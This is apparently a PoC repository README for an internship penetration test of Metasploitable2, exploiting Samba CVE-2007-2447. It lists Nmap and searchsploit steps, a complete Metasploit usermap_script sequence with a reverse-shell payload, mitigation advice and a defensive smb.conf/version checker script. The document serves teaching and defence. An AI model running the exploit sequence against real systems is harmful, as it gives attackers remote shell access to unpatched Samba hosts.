
CVE-2007-2447 PoC — Samba MS-RPC Shell Command Injection Vulnerability

Source
Associated Vulnerability
Title: Samba MS-RPC Shell Command Injection Vulnerability (CVE-2007-2447)
Description: The MS-RPC functionality in smbd in Samba 3.0.0 through 3.0.25rc3 allows remote attackers to execute arbitrary commands via shell metacharacters involving the (1) SamrChangePassword function, when the "username map script" smb.conf option is enabled, and allows remote authenticated users to execute commands via shell metacharacters involving other MS-RPC functions in the (2) remote printer and (3) file share management.
Description
Hands-on pentest project using Kali Linux vs Metasploitable2. Includes full workflow: Nmap scanning, enumeration, Metasploit exploitation (Samba CVE-2007-2447), post-exploitation validation, and mitigation steps. Repo contains commands, outputs, and report showing both offensive techniques and defensive recommendations.
Readme
**Internship Project 2 — Penetration Testing on Metasploitable2**

- Summary:
This project demonstrates a complete penetration testing workflow: reconnaissance, enumeration, exploitation, post-exploitation validation, and mitigation recommendations. The target used is Metasploitable2 and the attack box is Kali Linux.

- Tools:
  - Kali Linux (attacker)
  - Nmap (recon)
  - Metasploit Framework (exploitation)
  - SearchSploit / Exploit-DB (triage)

Steps performed:
1. Scanning:
   `sudo nmap -sS -sV -p- -T4 --open -oA scans/target 192.168.x.x`
   Identified services (examples): vsftpd 2.3.4 (port 21 banner), Samba smbd 3.x (port 445).
2. Enumeration & Triage:
   ```
   searchsploit --nmap scans/target.xml
   searchsploit samba 3.0.20
   ```
   Matched services to potential exploits (vsftpd backdoor, Samba username-map).
3. Exploitation:

  - vsftpd backdoor (CVE-2011-2523) attempted — Nmap banner present but service unresponsive; exploit did not create a session.
  - Samba (CVE-2007-2447) exploited successfully:
    ```
    msfconsole
    use exploit/multi/samba/usermap_script
    set RHOSTS 192.168.x.x
    set payload cmd/unix/reverse
    set LHOST <kali-ip>
    set LPORT 4444
    exploit
    ```
    Obtained an interactive shell and validated the user context.
4. Post-Exploitation:

  - Verified system info:
    ```
    id
    uname -a
    ```
  - Collected evidence and screenshots.
5. Mitigation Recommendations:

  - Regular scanning and asset inventory.
  - Prompt patching and version upgrades (update Samba).
  - Restrict access to critical ports (firewall rules).
  - Disable unused services and anonymous access.
  - Apply least privilege to shares and accounts.
  - Network segmentation and logging/monitoring.
  - Incident response planning.
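As an added defender-side check (example code, not part of this repo), the script below audits the two conditions the advisory above ties together: a Samba version in the affected range (3.0.0 through 3.0.25rc3) and a non-empty `username map script` in the `[global]` section of smb.conf. The banner string and the smb.conf text are constructed samples, and the script path in them is a placeholder.

```python
import re

def version_affected(banner):
    """True if a Samba banner such as 'Samba 3.0.20-Debian' or 'Samba 3.0.25rc2'
    falls in the advisory's range, 3.0.0 through 3.0.25rc3 (3.0.25 final is fixed)."""
    m = re.search(r"\b(\d+)\.(\d+)\.(\d+)(?:rc(\d+))?", banner)
    if not m:
        return False                         # unparseable banner: no match
    major, minor, patch, rc = m.groups()
    core = (int(major), int(minor), int(patch))
    if core == (3, 0, 25):                   # only the release candidates
        return rc is not None and int(rc) <= 3
    return (3, 0, 0) <= core < (3, 0, 25)

def username_map_script_enabled(smb_conf):
    """True if [global] sets 'username map script' to a non-empty value.
    Samba ignores case and whitespace in parameter names, so normalise the key."""
    section = None
    for raw in smb_conf.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":      # Samba comments are whole lines only
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif section == "global" and "=" in line:
            key, value = line.split("=", 1)
            if "".join(key.lower().split()) == "usernamemapscript" and value.strip():
                return True
    return False

def assess(banner, smb_conf):
    """Combine both signals into a one-line finding for the report."""
    bad_version = version_affected(banner)
    mapped = username_map_script_enabled(smb_conf)
    if bad_version and mapped:
        return "VULNERABLE: upgrade Samba and remove 'username map script'"
    if bad_version:
        return "AT RISK: affected Samba version (option currently unset)"
    if mapped:
        return "INFO: option set, but version outside the affected range"
    return "OK"

# Constructed sample smb.conf; the script path is a placeholder, not Metasploitable2's.
SAMPLE_SMB_CONF = """\
[global]
   Username Map Script = /etc/samba/scripts/mapusers.sh
"""

if __name__ == "__main__":
    print(assess("Samba smbd 3.0.20-Debian", SAMPLE_SMB_CONF))
```

The banner can be taken from the `-sV` output of the Nmap scan in step 1, while the smb.conf check has to run on the host itself (or against a configuration-management copy) since the option is not visible over the network.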

**Result**
Successfully obtained a remote shell via a Samba exploit, documented the attack path, and produced a mitigation plan. Full logs and command outputs are stored in the scans/ folder.

File Snapshot

```
[4.0K] /data/pocs/b5a12ac946bc5ce89aa02a36c28592915c448128
├── [1.1K] LICENSE
└── [1.9K] README.md

0 directories, 2 files
```